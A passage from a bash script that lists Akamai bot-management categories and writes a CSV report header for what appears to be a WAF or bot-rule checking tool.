'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed') if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv" fi readconfig $filecnf $property